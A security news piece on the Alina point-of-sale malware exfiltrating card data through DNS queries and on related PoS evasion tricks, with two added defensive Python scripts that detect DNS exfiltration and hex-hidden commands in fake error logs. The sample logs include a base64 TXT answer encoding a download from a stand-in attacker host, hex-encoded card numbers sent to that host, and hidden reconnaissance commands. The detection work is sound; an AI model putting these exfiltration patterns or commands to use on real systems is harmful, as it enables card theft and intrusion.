POS Malware Leverages DNS for Secret Communications

Sophisticated threat actors often hide their malicious communications inside legitimate-looking protocols in order to evade detection by security solutions. One recent example is a Point of Sale (PoS)-targeting malware that used DNS to carry its communications.

Alina learns the DNS language

Alina, the Point-of-Sale (PoS)-targeting malware first detected in 2012, was seen leveraging the DNS protocol for malicious communications with its server.
  • In June, the Alina PoS malware was found using the DNS protocol to send stolen credit card details to the attacker's remote servers.
  • On PoS devices, the malware performs RAM scraping to find and steal any unencrypted credit card data held in process memory. Before sending the card details to its C2 servers, the malware validates the card numbers with the Luhn checksum algorithm, so that only plausible card numbers are exfiltrated.
  • The malware also scrapes a large number of system processes (including Brain[.]exe, Focus[.]exe, appidt[.]exe, etc.) to steal credit card details.

Misuse of DNS-based communications

Alina is not the first malware to misuse DNS for malicious communications. In February, the Mozart malware was found using the DNS protocol (specifically DNS TXT records) to communicate with the remote attackers, avoiding detection by security software.
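Both DNS abuses described above, Alina smuggling card data outbound in query names and Mozart carrying its traffic in TXT records, leave the same kind of trace in DNS logs. The following is an added example (not code from the original article or from either malware family) of how a SOC could hunt for them offline: it hex-decodes labels under an attacker-controlled zone, keeps only digit runs that pass the Luhn check (the same validation Alina is reported to apply), and flags TXT answers that are nothing but a long base64 blob. The zone name `attacker.example`, the tab-separated log layout and the log lines themselves are all constructed for this example.

```python
import base64
import re
from typing import Dict, List, Optional

# Zone assumed to be attacker-controlled for this example (hypothetical name).
EXFIL_ZONE = "attacker.example"

# Constructed DNS log lines, not real traffic:
# timestamp, client, query type, query name, answer data ("-" if no answer).
# Lines 2-4 carry hex-encoded 16-digit numbers; only the first two pass Luhn.
SAMPLE_DNS_LOG = """\
1591959605.101\t10.0.5.21\tA\tupdate.vendor.example\t203.0.113.7
1591959606.221\t10.0.5.21\tA\t34353332303135313132383330333636.1.attacker.example\t-
1591959606.230\t10.0.5.21\tA\t34313131313131313131313131313131.2.attacker.example\t-
1591959607.005\t10.0.5.21\tA\t31323334353637383930313233343536.3.attacker.example\t-
1591959610.442\t10.0.5.21\tTXT\tcmd.attacker.example\tZG93bmxvYWQgaHR0cDovL2F0dGFja2VyLmV4YW1wbGUvdXBkYXRlLmV4ZQ==
1591959611.000\t10.0.5.22\tTXT\t_dmarc.vendor.example\tv=DMARC1; p=none
"""

PAN_RE = re.compile(r"(?<!\d)(\d{13,19})(?!\d)")        # candidate card numbers
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]+$")            # label made only of hex digits
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")      # whole answer is one base64 blob


def luhn_valid(digits: str) -> bool:
    """Luhn mod-10 check: double every second digit from the right, subtract 9 if > 9."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def decode_hex_labels(qname: str, zone: str) -> Optional[str]:
    """Strip the exfil zone and hex-decode every even-length hex label of the query name."""
    if not qname.endswith("." + zone):
        return None
    labels = qname[: -len(zone) - 1].split(".")
    payload = b""
    for label in labels:
        if HEX_LABEL_RE.match(label) and len(label) % 2 == 0:
            payload += bytes.fromhex(label)
    if not payload:
        return None
    return payload.decode("ascii", errors="replace")


def mask_pan(pan: str) -> str:
    """Keep BIN and last four digits so the finding can be logged without storing the PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def analyze_dns_log(log_text: str, zone: str = EXFIL_ZONE) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname, rdata = line.split("\t")
        # Alina-style: card data smuggled outbound inside the query name.
        decoded = decode_hex_labels(qname, zone)
        if decoded:
            for pan in PAN_RE.findall(decoded):
                if luhn_valid(pan):
                    findings.append({"ts": ts, "client": client, "type": "pan_in_qname",
                                     "qname": qname, "pan": mask_pan(pan)})
        # Mozart-style: an encoded payload delivered inbound in a TXT answer.
        if qtype == "TXT" and B64_RE.match(rdata):
            try:
                text = base64.b64decode(rdata, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if text.isprintable():
                findings.append({"ts": ts, "client": client, "type": "encoded_txt_answer",
                                 "qname": qname, "command": text})
    return findings


if __name__ == "__main__":
    for f in analyze_dns_log(SAMPLE_DNS_LOG):
        print(f)
```

The Luhn filter matters in practice: without it the third query (a hex-encoded `1234567890123456`) would be reported as a card number, and a real deployment would drown in such false positives. The base64 rule is deliberately strict (the whole answer must be one blob), so legitimate TXT records such as DMARC or SPF, which contain spaces and `=`, are not flagged.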

Other techniques for targeting PoS systems

Besides using DNS, attackers have tried various other tricks to hide malicious activity on PoS systems.
  • In June, hackers were seen hiding data in fake error logs, storing ASCII characters disguised as hexadecimal values. Once decoded, the content was used to collect information about the PoS software and other applications installed on the victim system.
  • In the same month, the operators of the Sodinokibi ransomware picked up the new tactic of scanning for PoS data and credit card details (besides their usual data-encryption attack) to generate extra money from victims.
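The fake-error-log trick above works because a line of `0x..` values looks like a routine error dump to a casual reader. As an added example (not code from the original article or from the reported campaign), the decoder below pulls the two-digit hex tokens out of each log line, rebuilds the bytes, and reports only lines whose tokens decode to clean printable ASCII, which is what separates hidden text from genuine error codes. The log lines, the decoded commands and the `MIN_TOKENS` threshold are constructed for this example.

```python
import re
from typing import Dict, List, Optional

# Exactly two hex digits after "0x", not part of a longer number such as 0x80070005.
HEX_TOKEN_RE = re.compile(r"(?<![0-9A-Za-z])0x([0-9A-Fa-f]{2})(?![0-9A-Za-z])")

# Below this many tokens a line is treated as ordinary error output (threshold is an assumption).
MIN_TOKENS = 8

# Constructed fake error log: lines 3 and 4 hide commands, the others are ordinary noise.
FAKE_ERROR_LOG = """\
2020-06-10 09:12:40 INFO  service started, build 4.2.1
2020-06-10 09:12:41 ERROR printer driver failed: status 0x80070005
2020-06-10 09:12:44 ERROR 0x77 0x6D 0x69 0x63 0x20 0x70 0x72 0x6F 0x64 0x75 0x63 0x74 0x20 0x67 0x65 0x74 0x20 0x6E 0x61 0x6D 0x65 0x2C 0x76 0x65 0x72 0x73 0x69 0x6F 0x6E
2020-06-10 09:12:45 ERROR 0x74 0x61 0x73 0x6B 0x6C 0x69 0x73 0x74 0x20 0x2F 0x76
2020-06-10 09:12:50 WARN  retry scheduled in 0x0A seconds
"""


def decode_hex_tokens(line: str) -> Optional[str]:
    """Return the ASCII text hidden in a line's hex tokens, or None if the line looks benign."""
    tokens = HEX_TOKEN_RE.findall(line)
    if len(tokens) < MIN_TOKENS:
        return None
    data = bytes(int(t, 16) for t in tokens)
    # Real error codes rarely decode to a full run of printable ASCII; hidden text always does.
    if not all(0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D) for b in data):
        return None
    return data.decode("ascii")


def scan_error_log(text: str) -> List[Dict[str, object]]:
    """Scan a log and return the line numbers and decoded text of every suspicious line."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        decoded = decode_hex_tokens(line)
        if decoded is not None:
            findings.append({"line": lineno, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for hit in scan_error_log(FAKE_ERROR_LOG):
        print(f"line {hit['line']}: {hit['decoded']!r}")
```

Run against the constructed log, the scanner surfaces the two hidden reconnaissance commands (a `wmic` product query and `tasklist /v`, the kind of software inventory the article describes) while ignoring the genuine `0x80070005` status code and the single `0x0A` token.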